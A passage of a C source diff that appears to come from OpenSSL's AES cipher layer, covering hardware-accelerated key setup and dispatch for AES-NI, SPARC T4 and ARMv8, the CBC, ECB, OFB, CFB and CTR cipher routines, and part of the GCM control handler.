+static const EVP_CIPHER aes_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,     \
+        keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_init_key,                   \
+        aes_##mode##_cipher,            \
+        NULL,                           \
+        sizeof(EVP_AES_KEY),            \
+        NULL,NULL,NULL,NULL }; \
+const EVP_CIPHER *EVP_aes_##keylen##_##mode(void) \
+{ return AESNI_CAPABLE?&aesni_##keylen##_##mode:&aes_##keylen##_##mode; }
+
+#  define BLOCK_CIPHER_custom(nid,keylen,blocksize,ivlen,mode,MODE,flags) \
+static const EVP_CIPHER aesni_##keylen##_##mode = { \
+        nid##_##keylen##_##mode,blocksize, \
+        (EVP_CIPH_##MODE##_MODE==EVP_CIPH_XTS_MODE?2:1)*keylen/8, ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aesni_##mode##_init_key,        \
+        aesni_##mode##_cipher,          \
+        aes_##mode##_cleanup,           \
+        sizeof(EVP_AES_##MODE##_CTX),   \
+        NULL,NULL,aes_##mode##_ctrl,NULL }; \
+static const EVP_CIPHER aes_##keylen##_##mode = { \
+        nid##_##keylen##_##mode,blocksize, \
+        (EVP_CIPH_##MODE##_MODE==EVP_CIPH_XTS_MODE?2:1)*keylen/8, ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_##mode##_init_key,          \
+        aes_##mode##_cipher,            \
+        aes_##mode##_cleanup,           \
+        sizeof(EVP_AES_##MODE##_CTX),   \
+        NULL,NULL,aes_##mode##_ctrl,NULL }; \
+const EVP_CIPHER *EVP_aes_##keylen##_##mode(void) \
+{ return AESNI_CAPABLE?&aesni_##keylen##_##mode:&aes_##keylen##_##mode; }
+
+# elif   defined(AES_ASM) && (defined(__sparc) || defined(__sparc__))
+
+#  include "sparc_arch.h"
+
+extern unsigned int OPENSSL_sparcv9cap_P[];
+
+#  define SPARC_AES_CAPABLE       (OPENSSL_sparcv9cap_P[1] & CFR_AES)
+
+void aes_t4_set_encrypt_key(const unsigned char *key, int bits, AES_KEY *ks);
+void aes_t4_set_decrypt_key(const unsigned char *key, int bits, AES_KEY *ks);
+void aes_t4_encrypt(const unsigned char *in, unsigned char *out,
+                    const AES_KEY *key);
+void aes_t4_decrypt(const unsigned char *in, unsigned char *out,
+                    const AES_KEY *key);
+/*
+ * Key-length specific subroutines were chosen for following reason.
+ * Each SPARC T4 core can execute up to 8 threads which share core's
+ * resources. Loading as much key material to registers allows to
+ * minimize references to shared memory interface, as well as amount
+ * of instructions in inner loops [much needed on T4]. But then having
+ * non-key-length specific routines would require conditional branches
+ * either in inner loops or on subroutines' entries. Former is hardly
+ * acceptable, while latter means code size increase to size occupied
+ * by multiple key-length specfic subroutines, so why fight?
+ */
+void aes128_t4_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const AES_KEY *key,
+                           unsigned char *ivec);
+void aes128_t4_cbc_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const AES_KEY *key,
+                           unsigned char *ivec);
+void aes192_t4_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const AES_KEY *key,
+                           unsigned char *ivec);
+void aes192_t4_cbc_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const AES_KEY *key,
+                           unsigned char *ivec);
+void aes256_t4_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const AES_KEY *key,
+                           unsigned char *ivec);
+void aes256_t4_cbc_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const AES_KEY *key,
+                           unsigned char *ivec);
+void aes128_t4_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t blocks, const AES_KEY *key,
+                             unsigned char *ivec);
+void aes192_t4_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t blocks, const AES_KEY *key,
+                             unsigned char *ivec);
+void aes256_t4_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t blocks, const AES_KEY *key,
+                             unsigned char *ivec);
+void aes128_t4_xts_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t blocks, const AES_KEY *key1,
+                           const AES_KEY *key2, const unsigned char *ivec);
+void aes128_t4_xts_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t blocks, const AES_KEY *key1,
+                           const AES_KEY *key2, const unsigned char *ivec);
+void aes256_t4_xts_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t blocks, const AES_KEY *key1,
+                           const AES_KEY *key2, const unsigned char *ivec);
+void aes256_t4_xts_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t blocks, const AES_KEY *key1,
+                           const AES_KEY *key2, const unsigned char *ivec);
+
+static int aes_t4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                           const unsigned char *iv, int enc)
+{
+    int ret, mode, bits;
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    mode = ctx->cipher->flags & EVP_CIPH_MODE;
+    bits = ctx->key_len * 8;
+    if ((mode == EVP_CIPH_ECB_MODE || mode == EVP_CIPH_CBC_MODE)
+        && !enc) {
+        ret = 0;
+        aes_t4_set_decrypt_key(key, bits, ctx->cipher_data);
+        dat->block = (block128_f) aes_t4_decrypt;
+        switch (bits) {
+        case 128:
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) aes128_t4_cbc_decrypt : NULL;
+            break;
+        case 192:
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) aes192_t4_cbc_decrypt : NULL;
+            break;
+        case 256:
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) aes256_t4_cbc_decrypt : NULL;
+            break;
+        default:
+            ret = -1;
+        }
+    } else {
+        ret = 0;
+        aes_t4_set_encrypt_key(key, bits, ctx->cipher_data);
+        dat->block = (block128_f) aes_t4_encrypt;
+        switch (bits) {
+        case 128:
+            if (mode == EVP_CIPH_CBC_MODE)
+                dat->stream.cbc = (cbc128_f) aes128_t4_cbc_encrypt;
+            else if (mode == EVP_CIPH_CTR_MODE)
+                dat->stream.ctr = (ctr128_f) aes128_t4_ctr32_encrypt;
+            else
+                dat->stream.cbc = NULL;
+            break;
+        case 192:
+            if (mode == EVP_CIPH_CBC_MODE)
+                dat->stream.cbc = (cbc128_f) aes192_t4_cbc_encrypt;
+            else if (mode == EVP_CIPH_CTR_MODE)
+                dat->stream.ctr = (ctr128_f) aes192_t4_ctr32_encrypt;
+            else
+                dat->stream.cbc = NULL;
+            break;
+        case 256:
+            if (mode == EVP_CIPH_CBC_MODE)
+                dat->stream.cbc = (cbc128_f) aes256_t4_cbc_encrypt;
+            else if (mode == EVP_CIPH_CTR_MODE)
+                dat->stream.ctr = (ctr128_f) aes256_t4_ctr32_encrypt;
+            else
+                dat->stream.cbc = NULL;
+            break;
+        default:
+            ret = -1;
+        }
+    }
+
+    if (ret < 0) {
+        EVPerr(EVP_F_AES_T4_INIT_KEY, EVP_R_AES_KEY_SETUP_FAILED);
+        return 0;
+    }
+
+    return 1;
+}
+
+#  define aes_t4_cbc_cipher aes_cbc_cipher
+static int aes_t4_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define aes_t4_ecb_cipher aes_ecb_cipher
+static int aes_t4_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define aes_t4_ofb_cipher aes_ofb_cipher
+static int aes_t4_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define aes_t4_cfb_cipher aes_cfb_cipher
+static int aes_t4_cfb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define aes_t4_cfb8_cipher aes_cfb8_cipher
+static int aes_t4_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define aes_t4_cfb1_cipher aes_cfb1_cipher
+static int aes_t4_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define aes_t4_ctr_cipher aes_ctr_cipher
+static int aes_t4_ctr_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+static int aes_t4_gcm_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+    EVP_AES_GCM_CTX *gctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key) {
+        int bits = ctx->key_len * 8;
+        aes_t4_set_encrypt_key(key, bits, &gctx->ks.ks);
+        CRYPTO_gcm128_init(&gctx->gcm, &gctx->ks,
+                           (block128_f) aes_t4_encrypt);
+        switch (bits) {
+        case 128:
+            gctx->ctr = (ctr128_f) aes128_t4_ctr32_encrypt;
+            break;
+        case 192:
+            gctx->ctr = (ctr128_f) aes192_t4_ctr32_encrypt;
+            break;
+        case 256:
+            gctx->ctr = (ctr128_f) aes256_t4_ctr32_encrypt;
+            break;
+        default:
+            return 0;
+        }
+        /*
+         * If we have an iv can set it directly, otherwise use saved IV.
+         */
+        if (iv == NULL && gctx->iv_set)
+            iv = gctx->iv;
+        if (iv) {
+            CRYPTO_gcm128_setiv(&gctx->gcm, iv, gctx->ivlen);
+            gctx->iv_set = 1;
+        }
+        gctx->key_set = 1;
+    } else {
+        /* If key set use IV, otherwise copy */
+        if (gctx->key_set)
+            CRYPTO_gcm128_setiv(&gctx->gcm, iv, gctx->ivlen);
+        else
+            memcpy(gctx->iv, iv, gctx->ivlen);
+        gctx->iv_set = 1;
+        gctx->iv_gen = 0;
+    }
+    return 1;
+}
+
+#  define aes_t4_gcm_cipher aes_gcm_cipher
+static int aes_t4_gcm_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+static int aes_t4_xts_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+    EVP_AES_XTS_CTX *xctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+
+    if (key) {
+        int bits = ctx->key_len * 4;
+        xctx->stream = NULL;
+        /* key_len is two AES keys */
+        if (enc) {
+            aes_t4_set_encrypt_key(key, bits, &xctx->ks1.ks);
+            xctx->xts.block1 = (block128_f) aes_t4_encrypt;
+            switch (bits) {
+            case 128:
+                xctx->stream = aes128_t4_xts_encrypt;
+                break;
+#  if 0                         /* not yet */
+            case 192:
+                xctx->stream = aes192_t4_xts_encrypt;
+                break;
+#  endif
+            case 256:
+                xctx->stream = aes256_t4_xts_encrypt;
+                break;
+            default:
+                return 0;
+            }
+        } else {
+            aes_t4_set_decrypt_key(key, ctx->key_len * 4, &xctx->ks1.ks);
+            xctx->xts.block1 = (block128_f) aes_t4_decrypt;
+            switch (bits) {
+            case 128:
+                xctx->stream = aes128_t4_xts_decrypt;
+                break;
+#  if 0                         /* not yet */
+            case 192:
+                xctx->stream = aes192_t4_xts_decrypt;
+                break;
+#  endif
+            case 256:
+                xctx->stream = aes256_t4_xts_decrypt;
+                break;
+            default:
+                return 0;
+            }
+        }
+
+        aes_t4_set_encrypt_key(key + ctx->key_len / 2,
+                               ctx->key_len * 4, &xctx->ks2.ks);
+        xctx->xts.block2 = (block128_f) aes_t4_encrypt;
+
+        xctx->xts.key1 = &xctx->ks1;
+    }
+
+    if (iv) {
+        xctx->xts.key2 = &xctx->ks2;
+        memcpy(ctx->iv, iv, 16);
+    }
+
+    return 1;
+}
+
+#  define aes_t4_xts_cipher aes_xts_cipher
+static int aes_t4_xts_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+static int aes_t4_ccm_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+    EVP_AES_CCM_CTX *cctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key) {
+        int bits = ctx->key_len * 8;
+        aes_t4_set_encrypt_key(key, bits, &cctx->ks.ks);
+        CRYPTO_ccm128_init(&cctx->ccm, cctx->M, cctx->L,
+                           &cctx->ks, (block128_f) aes_t4_encrypt);
+#  if 0                         /* not yet */
+        switch (bits) {
+        case 128:
+            cctx->str = enc ? (ccm128_f) aes128_t4_ccm64_encrypt :
+                (ccm128_f) ae128_t4_ccm64_decrypt;
+            break;
+        case 192:
+            cctx->str = enc ? (ccm128_f) aes192_t4_ccm64_encrypt :
+                (ccm128_f) ae192_t4_ccm64_decrypt;
+            break;
+        case 256:
+            cctx->str = enc ? (ccm128_f) aes256_t4_ccm64_encrypt :
+                (ccm128_f) ae256_t4_ccm64_decrypt;
+            break;
+        default:
+            return 0;
+        }
+#  endif
+        cctx->key_set = 1;
+    }
+    if (iv) {
+        memcpy(ctx->iv, iv, 15 - cctx->L);
+        cctx->iv_set = 1;
+    }
+    return 1;
+}
+
+#  define aes_t4_ccm_cipher aes_ccm_cipher
+static int aes_t4_ccm_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, size_t len);
+
+#  define BLOCK_CIPHER_generic(nid,keylen,blocksize,ivlen,nmode,mode,MODE,flags) \
+static const EVP_CIPHER aes_t4_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_t4_init_key,                \
+        aes_t4_##mode##_cipher,         \
+        NULL,                           \
+        sizeof(EVP_AES_KEY),            \
+        NULL,NULL,NULL,NULL }; \
+static const EVP_CIPHER aes_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,     \
+        keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_init_key,                   \
+        aes_##mode##_cipher,            \
+        NULL,                           \
+        sizeof(EVP_AES_KEY),            \
+        NULL,NULL,NULL,NULL }; \
+const EVP_CIPHER *EVP_aes_##keylen##_##mode(void) \
+{ return SPARC_AES_CAPABLE?&aes_t4_##keylen##_##mode:&aes_##keylen##_##mode; }
+
+#  define BLOCK_CIPHER_custom(nid,keylen,blocksize,ivlen,mode,MODE,flags) \
+static const EVP_CIPHER aes_t4_##keylen##_##mode = { \
+        nid##_##keylen##_##mode,blocksize, \
+        (EVP_CIPH_##MODE##_MODE==EVP_CIPH_XTS_MODE?2:1)*keylen/8, ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_t4_##mode##_init_key,       \
+        aes_t4_##mode##_cipher,         \
+        aes_##mode##_cleanup,           \
+        sizeof(EVP_AES_##MODE##_CTX),   \
+        NULL,NULL,aes_##mode##_ctrl,NULL }; \
+static const EVP_CIPHER aes_##keylen##_##mode = { \
+        nid##_##keylen##_##mode,blocksize, \
+        (EVP_CIPH_##MODE##_MODE==EVP_CIPH_XTS_MODE?2:1)*keylen/8, ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_##mode##_init_key,          \
+        aes_##mode##_cipher,            \
+        aes_##mode##_cleanup,           \
+        sizeof(EVP_AES_##MODE##_CTX),   \
+        NULL,NULL,aes_##mode##_ctrl,NULL }; \
+const EVP_CIPHER *EVP_aes_##keylen##_##mode(void) \
+{ return SPARC_AES_CAPABLE?&aes_t4_##keylen##_##mode:&aes_##keylen##_##mode; }
+
+# else
+
+#  define BLOCK_CIPHER_generic(nid,keylen,blocksize,ivlen,nmode,mode,MODE,flags) \
+static const EVP_CIPHER aes_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_init_key,                   \
+        aes_##mode##_cipher,            \
+        NULL,                           \
+        sizeof(EVP_AES_KEY),            \
+        NULL,NULL,NULL,NULL }; \
+const EVP_CIPHER *EVP_aes_##keylen##_##mode(void) \
+{ return &aes_##keylen##_##mode; }
+
+#  define BLOCK_CIPHER_custom(nid,keylen,blocksize,ivlen,mode,MODE,flags) \
+static const EVP_CIPHER aes_##keylen##_##mode = { \
+        nid##_##keylen##_##mode,blocksize, \
+        (EVP_CIPH_##MODE##_MODE==EVP_CIPH_XTS_MODE?2:1)*keylen/8, ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        aes_##mode##_init_key,          \
+        aes_##mode##_cipher,            \
+        aes_##mode##_cleanup,           \
+        sizeof(EVP_AES_##MODE##_CTX),   \
+        NULL,NULL,aes_##mode##_ctrl,NULL }; \
+const EVP_CIPHER *EVP_aes_##keylen##_##mode(void) \
+{ return &aes_##keylen##_##mode; }
+# endif
+
+# if defined(OPENSSL_CPUID_OBJ) && (defined(__arm__) || defined(__arm) || defined(__aarch64__))
+#  include "arm_arch.h"
+#  if __ARM_MAX_ARCH__>=7
+#   if defined(BSAES_ASM)
+#    define BSAES_CAPABLE (OPENSSL_armcap_P & ARMV7_NEON)
+#   endif
+#   define HWAES_CAPABLE (OPENSSL_armcap_P & ARMV8_AES)
+#   define HWAES_set_encrypt_key aes_v8_set_encrypt_key
+#   define HWAES_set_decrypt_key aes_v8_set_decrypt_key
+#   define HWAES_encrypt aes_v8_encrypt
+#   define HWAES_decrypt aes_v8_decrypt
+#   define HWAES_cbc_encrypt aes_v8_cbc_encrypt
+#   define HWAES_ctr32_encrypt_blocks aes_v8_ctr32_encrypt_blocks
+#  endif
+# endif
+
+# if defined(HWAES_CAPABLE)
+int HWAES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                          AES_KEY *key);
+int HWAES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                          AES_KEY *key);
+void HWAES_encrypt(const unsigned char *in, unsigned char *out,
+                   const AES_KEY *key);
+void HWAES_decrypt(const unsigned char *in, unsigned char *out,
+                   const AES_KEY *key);
+void HWAES_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                       size_t length, const AES_KEY *key,
+                       unsigned char *ivec, const int enc);
+void HWAES_ctr32_encrypt_blocks(const unsigned char *in, unsigned char *out,
+                                size_t len, const AES_KEY *key,
+                                const unsigned char ivec[16]);
+# endif
+
+# define BLOCK_CIPHER_generic_pack(nid,keylen,flags)             \
+        BLOCK_CIPHER_generic(nid,keylen,16,16,cbc,cbc,CBC,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)     \
+        BLOCK_CIPHER_generic(nid,keylen,16,0,ecb,ecb,ECB,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)      \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,ofb128,ofb,OFB,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)   \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,cfb128,cfb,CFB,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)   \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,cfb1,cfb1,CFB,flags)       \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,cfb8,cfb8,CFB,flags)       \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,ctr,ctr,CTR,flags)
+
+static int aes_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc)
+{
+    int ret, mode;
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    mode = ctx->cipher->flags & EVP_CIPH_MODE;
+    if ((mode == EVP_CIPH_ECB_MODE || mode == EVP_CIPH_CBC_MODE)
+        && !enc)
+# ifdef HWAES_CAPABLE
+        if (HWAES_CAPABLE) {
+            ret = HWAES_set_decrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+            dat->block = (block128_f) HWAES_decrypt;
+            dat->stream.cbc = NULL;
+#  ifdef HWAES_cbc_encrypt
+            if (mode == EVP_CIPH_CBC_MODE)
+                dat->stream.cbc = (cbc128_f) HWAES_cbc_encrypt;
+#  endif
+        } else
+# endif
+# ifdef BSAES_CAPABLE
+        if (BSAES_CAPABLE && mode == EVP_CIPH_CBC_MODE) {
+            ret = AES_set_decrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+            dat->block = (block128_f) AES_decrypt;
+            dat->stream.cbc = (cbc128_f) bsaes_cbc_encrypt;
+        } else
+# endif
+# ifdef VPAES_CAPABLE
+        if (VPAES_CAPABLE) {
+            ret = vpaes_set_decrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+            dat->block = (block128_f) vpaes_decrypt;
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) vpaes_cbc_encrypt : NULL;
+        } else
+# endif
+        {
+            ret = AES_set_decrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+            dat->block = (block128_f) AES_decrypt;
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) AES_cbc_encrypt : NULL;
+    } else
+# ifdef HWAES_CAPABLE
+    if (HWAES_CAPABLE) {
+        ret = HWAES_set_encrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+        dat->block = (block128_f) HWAES_encrypt;
+        dat->stream.cbc = NULL;
+#  ifdef HWAES_cbc_encrypt
+        if (mode == EVP_CIPH_CBC_MODE)
+            dat->stream.cbc = (cbc128_f) HWAES_cbc_encrypt;
+        else
+#  endif
+#  ifdef HWAES_ctr32_encrypt_blocks
+        if (mode == EVP_CIPH_CTR_MODE)
+            dat->stream.ctr = (ctr128_f) HWAES_ctr32_encrypt_blocks;
+        else
+#  endif
+            (void)0;            /* terminate potentially open 'else' */
+    } else
+# endif
+# ifdef BSAES_CAPABLE
+    if (BSAES_CAPABLE && mode == EVP_CIPH_CTR_MODE) {
+        ret = AES_set_encrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+        dat->block = (block128_f) AES_encrypt;
+        dat->stream.ctr = (ctr128_f) bsaes_ctr32_encrypt_blocks;
+    } else
+# endif
+# ifdef VPAES_CAPABLE
+    if (VPAES_CAPABLE) {
+        ret = vpaes_set_encrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+        dat->block = (block128_f) vpaes_encrypt;
+        dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+            (cbc128_f) vpaes_cbc_encrypt : NULL;
+    } else
+# endif
+    {
+        ret = AES_set_encrypt_key(key, ctx->key_len * 8, &dat->ks.ks);
+        dat->block = (block128_f) AES_encrypt;
+        dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+            (cbc128_f) AES_cbc_encrypt : NULL;
+# ifdef AES_CTR_ASM
+        if (mode == EVP_CIPH_CTR_MODE)
+            dat->stream.ctr = (ctr128_f) AES_ctr32_encrypt;
+# endif
+    }
+
+    if (ret < 0) {
+        EVPerr(EVP_F_AES_INIT_KEY, EVP_R_AES_KEY_SETUP_FAILED);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int aes_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    if (dat->stream.cbc)
+        (*dat->stream.cbc) (in, out, len, &dat->ks, ctx->iv, ctx->encrypt);
+    else if (ctx->encrypt)
+        CRYPTO_cbc128_encrypt(in, out, len, &dat->ks, ctx->iv, dat->block);
+    else
+        CRYPTO_cbc128_decrypt(in, out, len, &dat->ks, ctx->iv, dat->block);
+
+    return 1;
+}
+
+static int aes_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    size_t bl = ctx->cipher->block_size;
+    size_t i;
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    if (len < bl)
+        return 1;
+
+    for (i = 0, len -= bl; i <= len; i += bl)
+        (*dat->block) (in + i, out + i, &dat->ks);
+
+    return 1;
+}
+
+static int aes_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    CRYPTO_ofb128_encrypt(in, out, len, &dat->ks,
+                          ctx->iv, &ctx->num, dat->block);
+    return 1;
+}
+
+static int aes_cfb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    CRYPTO_cfb128_encrypt(in, out, len, &dat->ks,
+                          ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+    return 1;
+}
+
+static int aes_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t len)
+{
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    CRYPTO_cfb128_8_encrypt(in, out, len, &dat->ks,
+                            ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+    return 1;
+}
+
+static int aes_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t len)
+{
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    if (ctx->flags & EVP_CIPH_FLAG_LENGTH_BITS) {
+        CRYPTO_cfb128_1_encrypt(in, out, len, &dat->ks,
+                                ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+        return 1;
+    }
+
+    while (len >= MAXBITCHUNK) {
+        CRYPTO_cfb128_1_encrypt(in, out, MAXBITCHUNK * 8, &dat->ks,
+                                ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+        len -= MAXBITCHUNK;
+    }
+    if (len)
+        CRYPTO_cfb128_1_encrypt(in, out, len * 8, &dat->ks,
+                                ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+
+    return 1;
+}
+
+static int aes_ctr_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    unsigned int num = ctx->num;
+    EVP_AES_KEY *dat = (EVP_AES_KEY *) ctx->cipher_data;
+
+    if (dat->stream.ctr)
+        CRYPTO_ctr128_encrypt_ctr32(in, out, len, &dat->ks,
+                                    ctx->iv, ctx->buf, &num, dat->stream.ctr);
+    else
+        CRYPTO_ctr128_encrypt(in, out, len, &dat->ks,
+                              ctx->iv, ctx->buf, &num, dat->block);
+    ctx->num = (size_t)num;
+    return 1;
+}
+
+BLOCK_CIPHER_generic_pack(NID_aes, 128, EVP_CIPH_FLAG_FIPS)
+    BLOCK_CIPHER_generic_pack(NID_aes, 192, EVP_CIPH_FLAG_FIPS)
+    BLOCK_CIPHER_generic_pack(NID_aes, 256, EVP_CIPH_FLAG_FIPS)
+
+static int aes_gcm_cleanup(EVP_CIPHER_CTX *c)
+{
+    EVP_AES_GCM_CTX *gctx = c->cipher_data;
+    OPENSSL_cleanse(&gctx->gcm, sizeof(gctx->gcm));
+    if (gctx->iv != c->iv)
+        OPENSSL_free(gctx->iv);
+    return 1;
+}
+
+/* increment counter (64-bit int) by 1 */
+static void ctr64_inc(unsigned char *counter)
+{
+    int n = 8;
+    unsigned char c;
+
+    do {
+        --n;
+        c = counter[n];
+        ++c;
+        counter[n] = c;
+        if (c)
+            return;
+    } while (n);
+}
+
+static int aes_gcm_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+    EVP_AES_GCM_CTX *gctx = c->cipher_data;
+    switch (type) {
+    case EVP_CTRL_INIT:
+        gctx->key_set = 0;
+        gctx->iv_set = 0;
+        gctx->ivlen = c->cipher->iv_len;
+        gctx->iv = c->iv;
+        gctx->taglen = -1;
+        gctx->iv_gen = 0;
+        gctx->tls_aad_len = -1;
+        return 1;
+
+    case EVP_CTRL_GCM_SET_IVLEN:
+        if (arg <= 0)
+            return 0;
+        /* Allocate memory for IV if needed */
+        if ((arg > EVP_MAX_IV_LENGTH) && (arg > gctx->ivlen)) {
+            if (gctx->iv != c->iv)
+                OPENSSL_free(gctx->iv);
+            gctx->iv = OPENSSL_malloc(arg);
+            if (!gctx->iv)
+                return 0;
+        }
+        gctx->ivlen = arg;
+        return 1;
+
+    case EVP_CTRL_GCM_SET_TAG:
+        if (arg <= 0 || arg > 16 || c->encrypt)
+            return 0;
+        memcpy(c->buf, ptr, arg);
+        gctx->taglen = arg;
+        return 1;
+
+    case EVP_CTRL_GCM_GET_TAG:
+        if (arg <= 0 || arg > 16 || !c->encrypt || gctx->taglen < 0)
+            return 0;
+        memcpy(ptr, c->buf, arg);
+        return 1;
+
+    case EVP_CTRL_GCM_SET_IV_FIXED:
+        /* Special case: -1 length restores whole IV */
+        if (arg == -1) {
+            memcpy(gctx->iv, ptr, gctx->ivlen);
+            gctx->iv_gen = 1;
+            return 1;
+        }
+        /*
+         * Fixed field must be at least 4 bytes and invocation field at least
+         * 8.
+         */
+        if ((arg < 4) || (gctx->ivlen - arg) < 8)
+            return 0;
+        if (arg)
+            memcpy(gctx->iv, ptr, arg);
+        if (c->encrypt && RAND_bytes(gctx->iv + arg, gctx->ivlen - arg) <= 0)
+            return 0;
+        gctx->iv_gen = 1;
+        return 1;
+
+    case EVP_CTRL_GCM_IV_GEN:
+        if (gctx->iv_gen == 0 || gctx->key_set == 0)
+            return 0;
+        CRYPTO_gcm128_setiv(&gctx->gcm, gctx->iv, gctx->ivlen);
+        if (arg <= 0 || arg > gctx->ivlen)
+            arg = gctx->ivlen;
+        memcpy(ptr, gctx->iv + gctx->ivlen - arg, arg);
+        /*
+         * Invocation field will be at least 8 bytes in size and so no need
+         * to check wrap around or increment more than last 8 bytes.
+         */
+        ctr64_inc(gctx->iv + gctx->ivlen - 8);
+        gctx->iv_set = 1;
+        return 1;
+
+    case EVP_CTRL_GCM_SET_IV_INV:
